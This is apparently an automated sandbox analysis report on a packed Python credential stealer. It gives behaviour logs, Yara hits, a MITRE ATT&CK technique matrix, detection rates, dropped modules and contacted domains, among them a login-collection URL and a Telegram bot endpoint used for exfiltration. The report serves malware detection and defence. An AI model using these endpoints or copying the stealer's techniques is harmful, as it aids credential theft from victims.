      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75682 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75682\pyexpat.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\Desktop\MkWMm5piE5.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\Desktop\MkWMm5piE5.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\Desktop\MkWMm5piE5.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75682 VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\Desktop\MkWMm5piE5.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\Desktop\MkWMm5piE5.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\Desktop\MkWMm5piE5.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\Desktop\MkWMm5piE5.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\Desktop\MkWMm5piE5.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\Desktop\MkWMm5piE5.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\Desktop\MkWMm5piE5.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\Desktop\MkWMm5piE5.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\Desktop\MkWMm5piE5.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\Desktop\MkWMm5piE5.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\Desktop\MkWMm5piE5.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\Desktop\MkWMm5piE5.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\Desktop\MkWMm5piE5.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\Desktop\MkWMm5piE5.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\Desktop\MkWMm5piE5.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\Desktop\MkWMm5piE5.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\Desktop\MkWMm5piE5.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\Desktop\MkWMm5piE5.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\Desktop\MkWMm5piE5.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\Desktop\MkWMm5piE5.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeQueries volume information: C:\Users\user\Desktop\MkWMm5piE5.exe VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDCC460 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7FBDCC460
      Source: C:\Users\user\Desktop\MkWMm5piE5.exeCode function: 0_2_00007FF7FBDE6370 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF7FBDE6370

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000002.00000002.2592909254.000001E4C9C7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: MkWMm5piE5.exe PID: 7680, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000002.00000002.2592909254.000001E4C9C7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: MkWMm5piE5.exe PID: 7680, type: MEMORYSTR
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
      Windows Management Instrumentation
      1
      DLL Side-Loading
      11
      Process Injection
      31
      Virtualization/Sandbox Evasion
      OS Credential Dumping2
      System Time Discovery
      Remote Services1
      Archive Collected Data
      22
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Command and Scripting Interpreter
      Boot or Logon Initialization Scripts1
      DLL Side-Loading
      11
      Process Injection
      LSASS Memory31
      Security Software Discovery
      Remote Desktop ProtocolData from Removable Media1
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Native API
      Logon Script (Windows)Logon Script (Windows)1
      Deobfuscate/Decode Files or Information
      Security Account Manager1
      Process Discovery
      SMB/Windows Admin SharesData from Network Shared Drive2
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
      Obfuscated Files or Information
      NTDS31
      Virtualization/Sandbox Evasion
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Timestomp
      LSA Secrets1
      Application Window Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain Credentials1
      File and Directory Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync24
      System Information Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      MkWMm5piE5.exe42%ReversingLabsWin32.Ransomware.PythonStealer
      MkWMm5piE5.exe100%AviraTR/AVI.Agent.gagco
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_ARC4.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_Salsa20.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_chacha20.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_pkcs1_decode.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_aes.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_aesni.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_arc2.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_blowfish.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_cast.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_cbc.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_cfb.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_ctr.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_des.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_des3.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_ecb.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_eksblowfish.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_ocb.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Cipher\_raw_ofb.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_BLAKE2b.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_BLAKE2s.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_MD2.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_MD4.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_MD5.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_RIPEMD160.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_SHA1.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_SHA224.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_SHA256.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_SHA384.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_SHA512.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_ghash_clmul.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_ghash_portable.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_keccak.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Hash\_poly1305.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Math\_modexp.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Protocol\_scrypt.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\PublicKey\_ec_ws.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\PublicKey\_ed25519.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\PublicKey\_ed448.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\PublicKey\_x25519.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Util\_cpuid_c.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\Crypto\Util\_strxor.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\VCRUNTIME140.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\VCRUNTIME140_1.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\_asyncio.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\_bz2.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\_cffi_backend.cp312-win_amd64.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\_ctypes.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\_decimal.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\_hashlib.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\_lzma.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\_multiprocessing.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\_overlapped.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\_queue.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\_socket.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\_sqlite3.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\_ssl.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\_wmi.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\charset_normalizer\md.cp312-win_amd64.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\charset_normalizer\md__mypyc.cp312-win_amd64.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\cryptography\hazmat\bindings\_rust.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\libcrypto-3.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\libffi-8.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\libssl-3.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\pyexpat.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\python3.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\python312.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\pywin32_system32\pywintypes312.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\select.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\sqlite3.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\unicodedata.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\win32\win32api.pyd0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI75682\win32\win32crypt.pyd0%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://repository.swisssign.com/y0%Avira URL Cloudsafe
      https://busquedasxurl.com/login/conexion/recibidor.phpPkw0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      busquedasxurl.com
      82.180.136.22
      truefalse
        high
        httpbin.org
        44.196.3.45
        truefalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdfMkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9BF6000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://github.com/pyca/cryptography/issues/8996MkWMm5piE5.exe, 00000002.00000002.2595739361.00007FFEDCA03000.00000002.00000001.01000000.0000001F.sdmpfalse
              high
              https://api.telegram.org/botMkWMm5piE5.exe, 00000002.00000002.2592677743.000001E4C9A80000.00000004.00001000.00020000.00000000.sdmpfalse
                high
                https://api.telegram.org/botzMkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C8FB0000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesMkWMm5piE5.exe, 00000002.00000002.2592677743.000001E4C9A80000.00000004.00001000.00020000.00000000.sdmpfalse
                    high
                    http://aka.ms/vcpython27MkWMm5piE5.exe, 00000002.00000002.2592399511.000001E4C96B0000.00000004.00001000.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1369245060.000001E4C9189000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1369155370.000001E4C8CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://github.com/mhammond/pywin32MkWMm5piE5.exe, MkWMm5piE5.exe, 00000002.00000002.2597001843.00007FFEDD1D1000.00000002.00000001.01000000.0000001D.sdmp, MkWMm5piE5.exe, 00000002.00000002.2597088127.00007FFEDD1FE000.00000002.00000001.01000000.0000001C.sdmp, win32api.pyd.0.dr, pywintypes312.dll.0.drfalse
                        high
                        http://crl.dhimyotis.com/certignarootca.crl0MkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9C7E000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://docs.python.org/library/unittest.htmlMkWMm5piE5.exe, 00000002.00000002.2591804571.000001E4C9196000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://setuptools.pypa.io/en/latest/MkWMm5piE5.exe, 00000002.00000002.2592327378.000001E4C95B0000.00000004.00001000.00020000.00000000.sdmpfalse
                              high
                              http://crl.dhimyotis.com/certignarootca.crl8MkWMm5piE5.exe, 00000002.00000002.2592133648.000001E4C9358000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#MkWMm5piE5.exe, 00000002.00000002.2591216215.000001E4C8770000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://github.com/pyca/cryptography/actions?query=workflow%3ACIMETADATA.0.drfalse
                                    high
                                    https://tools.ietf.org/html/rfc2388#section-4.4MkWMm5piE5.exe, 00000002.00000002.2591474381.000001E4C8CD7000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895659097.000001E4C8CD7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://packaging.python.org/en/latest/specifications/core-metadata/MkWMm5piE5.exe, 00000002.00000002.2592399511.000001E4C96B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                        high
                                        https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64MkWMm5piE5.exe, 00000002.00000002.2591474381.000001E4C8CD7000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1366935243.000001E4C8D1B000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895659097.000001E4C8CD7000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1367667918.000001E4C8D1B000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1369155370.000001E4C8CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://github.com/pypa/packagingMkWMm5piE5.exe, 00000002.00000002.2592255274.000001E4C94B0000.00000004.00001000.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1368496921.000001E4C8C65000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://crl.xrampsecurity.com/XGCA.crleMkWMm5piE5.exe, 00000002.00000003.1895826956.000001E4C9CBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://refspecs.linuxfoundation.org/elf/gabi4MkWMm5piE5.exe, 00000002.00000002.2593244790.000001E4CA380000.00000004.00001000.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592255274.000001E4C94B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                high
                                                https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1418909685.0000023333214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1399688646.0000023324A97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1418909685.0000023333356000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963MkWMm5piE5.exe, 00000002.00000002.2593244790.000001E4CA380000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    high
                                                    http://docs.python.org/3/library/subprocess#subprocess.Popen.killMkWMm5piE5.exe, 00000002.00000002.2592502261.000001E4C9880000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      high
                                                      https://tools.ietf.org/html/rfc3610MkWMm5piE5.exe, 00000002.00000002.2591216215.000001E4C87BC000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9C7E000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2591216215.000001E4C8770000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://github.com/platformdirs/platformdirsMkWMm5piE5.exe, 00000002.00000002.2592677743.000001E4C9A80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          high
                                                          https://peps.python.org/pep-0205/MkWMm5piE5.exe, 00000002.00000002.2591721135.000001E4C8EB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crl.dhimyotis.com/certignarootca.crlMkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9C7E000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895620190.000001E4C9D62000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895390615.000001E4C9D5C000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1896118922.000001E4C9D65000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592133648.000001E4C9358000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1894910395.000001E4C9D5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://curl.haxx.se/rfc/cookie_spec.htmlMkWMm5piE5.exe, 00000002.00000002.2593332295.000001E4CA480000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                high
                                                                http://ocsp.accv.esMkWMm5piE5.exe, 00000002.00000003.1894910395.000001E4C9D34000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9DCF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://docs.python.org/3/library/subprocess#subprocess.Popen.returncodeMkWMm5piE5.exe, 00000002.00000002.2592502261.000001E4C9880000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1399688646.00000233231A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyMkWMm5piE5.exe, 00000002.00000002.2593332295.000001E4CA480000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688MkWMm5piE5.exe, 00000002.00000002.2591032403.000001E4C863C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://httpbin.org/getMkWMm5piE5.exe, 00000002.00000002.2593414645.000001E4CA5A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://packaging.python.org/en/latest/specifications/entry-points/MkWMm5piE5.exe, 00000002.00000002.2592327378.000001E4C95B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1399688646.00000233233D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-accessMkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9B80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://pypi.org/project/build/).MkWMm5piE5.exe, 00000002.00000002.2592255274.000001E4C94B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1399688646.00000233233D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://go.micropowershell.exe, 00000003.00000002.1399688646.0000023323DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://wwww.certigna.fr/autorites/0mMkWMm5piE5.exe, 00000002.00000002.2592909254.000001E4C9C7E000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9BF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerMkWMm5piE5.exe, 00000002.00000002.2591216215.000001E4C8770000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://foo/bar.tgzMkWMm5piE5.exe, 00000002.00000002.2592255274.000001E4C94B0000.00000004.00001000.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000002.2592677743.000001E4C9A80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://github.com/python/cpython/issues/86361.MkWMm5piE5.exe, 00000002.00000002.2591474381.000001E4C8CD7000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1366935243.000001E4C8D1B000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1366140279.000001E4C8D3B000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1895659097.000001E4C8CD7000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1365206940.000001E4C8D3C000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1365438520.000001E4C8D20000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1367667918.000001E4C8D1B000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1369155370.000001E4C8CB8000.00000004.00000020.00020000.00000000.sdmp, MkWMm5piE5.exe, 00000002.00000003.1365279258.000001E4C8D4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://contoso.com/Iconpowershell.exe, 00000003.00000002.1418909685.0000023333356000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://httpbin.org/MkWMm5piE5.exe, 00000002.00000002.2592757791.000001E4C9B80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
